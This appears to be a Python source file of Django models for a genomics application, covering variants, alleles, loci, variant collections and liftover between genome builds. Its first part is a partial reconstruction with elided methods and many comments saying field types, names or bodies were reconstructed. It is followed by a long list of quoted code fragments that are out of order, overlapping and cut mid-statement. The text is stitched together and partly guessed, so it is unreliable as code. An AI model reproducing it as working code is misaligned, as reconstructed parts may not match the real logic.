    def is_ref_alt_reference(ref, alt):
        return ref == alt or alt == '.'

    @lazy
    def allele(self) -> Optional[Allele]:
        va = VariantAllele.objects.filter(variant=self).first()
        if va:
            return va.allele
        return None

    @property
    def equivalent_variants(self) -> Iterable['Variant']:
        allele = self.allele
        if not allele:
            return [self]
        return Variant.objects.filter(variantallele__allele=allele)

    @property
    def is_reference(self) -> bool:
        return self.alt.seq == self.REFERENCE_ALT

    @property
    def is_standard_variant(self) -> bool:
        """ Variant alt sequence is standard """
        # Only the alt needs to be standard...
        return self.alt.is_standard_sequence()

    @property
    def is_indel(self) -> bool:
        return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length

    @property
    def is_insertion(self) -> bool:
        return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length  # body reconstructed

    @property
    def can_have_annotation(self) -> bool:
        return self.is_standard_variant

    def as_tuple(self) -> VariantCoordinate:
        return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq

    def is_abbreviated(self):
        return str(self) != self.full_string

    @lazy
    def full_string(self):
        """ No abbreviation """
        return self.format_tuple(*self.as_tuple())

    def __str__(self):
        return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)

    def get_absolute_url(self):
        # will show allele if there is one, otherwise go to variant page
        ...

    def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
        vav = genome_build.latest_variant_annotation_version
        if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():
            return can
        if version := self.varianttranscriptannotation_set.filter(version=vav).first():
            return version
        if any_at_all := self.varianttranscriptannotation_set.first():
            return any_at_all

    def get_canonical_c_hgvs(self, genome_build):
        c_hgvs = None
        if cta := self.get_canonical_transcript_annotation(genome_build):
            c_hgvs = cta.hgvs_c
        return c_hgvs

    @property
    def start(self):
        return self.locus.position

    @property
    def end(self):
        return self.locus.position + max(self.locus.ref.length, self.alt.length)

    @staticmethod
    def clean_variant_fields(chrom, position, ref, alt, want_chr):
        ref = ref.strip().upper()
        alt = alt.strip().upper()
        if Variant.is_ref_alt_reference(ref, alt):
            alt = Variant.REFERENCE_ALT
        chrom = format_chrom(chrom, want_chr)
        return chrom, position, ref, alt


class VariantWiki(Wiki):
    variant = models.OneToOneField(Variant, on_delete=CASCADE)  # field type reconstructed


class VariantAllele(TimeStampedModel):
    """ It's possible for multiple variants from the same genome build to resolve to the same
        allele (due to our normalization not being the same as ClinGen's); in those cases
        we'll have the same variant linked through different VariantAlleles (so it can't be 1-to-1)

        We only ever expect to have the same 3 variant/build/allele, so we can add that
        unique_together constraint

        We only expect to store Alleles for a small fraction of Variants, so don't want
        them on the Variant object - instead do 1-to-1 """

    variant = models.ForeignKey(Variant, on_delete=CASCADE)
    genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
    allele = models.ForeignKey(Allele, on_delete=CASCADE)
    origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)  # choices reconstructed
    conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
    error = models.JSONField(null=True)  # field type reconstructed

    class Meta:
        unique_together = ("variant", "genome_build", "allele")

    # ... (method deciding whether a ClinGen error is worth retrying; only the tail is recoverable:
    #      returns self.error.get("errorType") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE)

    def __str__(self):
        return f"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})"


class VariantCollection(RelatedModelsPartitionModel):
    """ ... a cached result """

    RECORDS_BASE_TABLE_NAMES = ["snpdb_variantcollectionrecord"]
    RECORDS_FK_FIELD_TO_THIS_MODEL = "variant_collection_id"
    PARTITION_LABEL_TEXT = "variant_collection"
    name = models.TextField(null=True)
    count = models.IntegerField(null=True)
    status = models.CharField(max_length=1, choices=ProcessingStatus.choices)  # field reconstructed

    @property
    def variant_collection_alias(self):  # name/body reconstructed from usage below
        return f"variantcollection_{self.pk}"

    def get_annotation_kwargs(self):  # name reconstructed
        vcr_condition = Q(variantcollectionrecord__variant_collection=self)
        return {self.variant_collection_alias: FilteredRelation("variantcollectionrecord",
                                                                condition=vcr_condition)}

    def get_q(self):
        if self.status != ProcessingStatus.SUCCESS:
            raise ValueError(f"{self}: status {self.get_status_display()} != SUCCESS")
        return Q(**{f"{self.variant_collection_alias}__isnull": False})

    def __str__(self):
        return f"VariantCollection: {self.pk} ({self.name})"


class VariantCollectionRecord(models.Model):
    variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING)  # on_delete reconstructed
    variant = models.ForeignKey(Variant, on_delete=CASCADE)


class AlleleSource(models.Model):
    objects = InheritanceManager()

    def get_genome_build(self):
        return None

    def get_variants_qs(self):
        return Variant.objects.none()

    def get_allele_qs(self) -> QuerySet:
        return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())  # body reconstructed

    def liftover_complete(self, genome_build: GenomeBuild):
        """ This is called at the end of a liftover pipeline (once per build) """
        pass


class VariantAlleleSource(AlleleSource):
    variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)

    def get_genome_build(self):
        return self.variant_allele.genome_build

    def get_variants_qs(self):
        return Variant.objects.filter(variantallele=self.variant_allele)

    @staticmethod
    def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:  # signature reconstructed
        allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)
        return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()


class VariantAlleleCollectionSource(AlleleSource):
    genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)

    def get_genome_build(self):
        return self.genome_build

    def get_variants_qs(self):
        return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())  # body reconstructed

    def get_variant_allele_ids(self):
        return self.variantallelecollectionrecord_set.values_list("variant_allele", flat=True)


class VariantAlleleCollectionRecord(models.Model):
    collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)
    variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)


class Liftover(TimeStampedModel):
    """ Liftover pipelines work by writing a VCF with the ID set to Allele.pk and then
        creating VariantAllele entries for the variant/allele

        Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF out
        in the desired build directly; ... is set in UploadedFile for the UploadPipeline """

    user = models.ForeignKey(User, on_delete=CASCADE)
    allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)
    conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
    source_vcf = models.TextField(null=True)
    source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,
                                            related_name="liftover_source_genome_build")
    genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)  # destination

    def get_allele_source(self) -> AlleleSource:
        """ Returns subclass instance """
        return AlleleSource.objects.get_subclass(pk=self.allele_source_id)

    def get_allele_qs(self) -> QuerySet:
        return self.get_allele_source().get_allele_qs()

    def complete(self):
        self.get_allele_source().liftover_complete(genome_build=self.genome_build)

    def __str__(self):
        source = ""
        if self.source_genome_build:
            source = f"from {self.source_genome_build.name} "
        return f"Liftover {source}to {self.genome_build.name}"  # return string reconstructed


class LiftoverError(models.Model):  # class name reconstructed
    liftover = models.ForeignKey(Liftover, on_delete=CASCADE)
    allele = models.ForeignKey(Allele, on_delete=CASCADE)
    variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE)  # Optional, if got a variant but invalid
    error_message = models.TextField()

    class Meta:
        unique_together = ("liftover", "allele")  # fields reconstructed
"@property def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length)",
"representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37)",
"{self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for",
"ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt)",
"f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if",
"self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def",
"other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message =",
"related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success =",
"va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\",",
"Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or",
"= models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid error_message",
"= self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va",
"import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import",
"get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource",
"return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True)",
"= models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta:",
"None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool,",
"that unique_together constraint We only expect to store Alleles for a small fraction",
"cases # we'll have the same variant linked through different VariantAlleles (so it",
"alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return",
"from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import",
"merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\"",
"models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) ->",
"return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple())",
"ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible",
"LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal =",
"on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\",",
"if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names",
"({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant",
"to add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length",
"\"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): #",
"class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return",
"# we'll have the same variant linked through different VariantAlleles (so it can't",
"GRCh38 variants for same change point to same allele This is generally done",
"User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in",
"[GATCN] (ie not special or reference) \"\"\" # locus.ref should always be standard...",
"validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for missing representations",
"import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares",
"through different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build",
"\"\"\" Liftover pipeline involves reading through a VCF where ID is set to",
"self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only",
"s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs",
"from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from",
"\"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool =",
"variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")}",
"done via ClinGen Allele Registry, but sometimes that can fail. Linked against Variant",
"return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom,",
"Variant for a given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT",
"= AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool,",
"alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def",
"return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover",
"4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None if m",
"lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models",
"show allele if there is one, otherwise go to variant page return reverse('view_allele',",
">= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q",
"to retrieve in all builds, but at least one # links there, and",
"max_length: int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s",
"= models.JSONField(null=True) # Only set on error class Meta: unique_together = (\"variant\", \"genome_build\",",
"for build {genome_build}') if not va: va = vas.first() if va: return va.variant",
"\"\"\" Used by to write VCF coordinates during liftover. Can be slow (API",
"is unique (so Locus/Variant can have unique constraints) Postgres by default uses indexes",
"and GRCh38 variants for same change point to same allele This is generally",
"A set of variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES",
"import collections import logging import re from typing import Optional, Pattern, Tuple, Iterable,",
"in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool =",
"def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if",
"\"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge",
"True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and",
"return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q)",
"bug to have the same 3 variant/build/allele so we can add that unique_together",
"be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele,",
"Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) -",
"unique (so Locus/Variant can have unique constraints) Postgres by default uses indexes for",
"return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: #",
"-> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy",
"ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except",
"@staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match and",
"va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele",
"Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class",
"models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod",
"qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref",
"Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build",
"return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set",
"Postgres by default uses indexes for constraints, and large TextFields give error of:",
"\"\"\" Genome build independent - ie GRCh37 and GRCh38 variants for same change",
"# Various contig errors all subclass from this pass if g_hgvs is None:",
"Iterable['Variant']: allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self,",
"Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self):",
"but at least one # links there, and can't have another, so it'll",
"variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if",
"locus for the row) There is only 1 Variant for a given locus/alt",
"should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq",
"re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin,",
"Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so Locus/Variant can have",
"other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele",
"position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt =",
"- ie GRCh37 and GRCh38 variants for same change point to same allele",
"Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs,",
"UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)",
"Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self):",
"# Only set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property",
"= models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) #",
"has to have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple =",
"= md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int =",
"Alleles for a small fraction of Variants So don't want them on the",
"into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self}",
"try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build:",
"= f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover",
"Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod",
"message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have",
"same locus) There is only 1 Locus for a given chrom/position/ref per database",
"= models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves",
"= vas.first() if va: return va.variant raise ValueError(f'Could not find any variants in",
"except ValueError: # Various contig errors all subclass from this pass if g_hgvs",
"!= Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq",
"build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple #",
"different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build =",
"for constraints, and large TextFields give error of: \"index row requires x bytes,",
"instead do 1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share MT",
"error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build)",
"build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele",
"re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie",
"build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start,",
"-> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)",
"it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc :=",
"likely. It's a bug to have the same 3 variant/build/allele so we can",
"return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\",",
"can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name",
"\"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)",
"same genome build to resolve to the same allele (due to our normalization",
"ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) ->",
"in the build being used by ClinGen) - but it's not likely. It's",
"(\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and",
"a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"),",
"in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig",
"Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False",
"get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return",
"only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per",
"MT and some unplaced scaffolds) - in those cases # we'll have the",
"(NCBI Remap) we need to write the source genome build VCF first Alleles",
"return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self)",
"allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got",
"result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name =",
"= Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\"",
"models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return",
"is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property def is_reference(self)",
"c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self):",
"contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases",
"some unplaced scaffolds) - in those cases # we'll have the same variant",
"we can write the VCF in the desired genome build For others (NCBI",
"the same genome build to resolve to the same allele (due to our",
"self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\"",
"bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt",
"{self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at a locus Usually",
"\"index row requires x bytes, maximum size is 8191\" The easiest solution is",
"on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) |",
"allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version",
"+= f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec == 'CA'",
"f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False)",
"-> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self)",
"1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE)",
"-> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va :=",
"Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import",
"to the same locus for the row) There is only 1 Variant for",
"def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None",
"go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return",
"get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele,",
"only 1 Locus for a given chrom/position/ref per database (handled via insertion queues)",
"IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build,",
"There is only 1 Locus for a given chrom/position/ref per database (handled via",
"ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref,",
"clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there",
"Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end of",
"in a VCF file (ref + >= 1 alts pointing to the same",
"GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have",
"pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt",
"settings from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import",
"flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from",
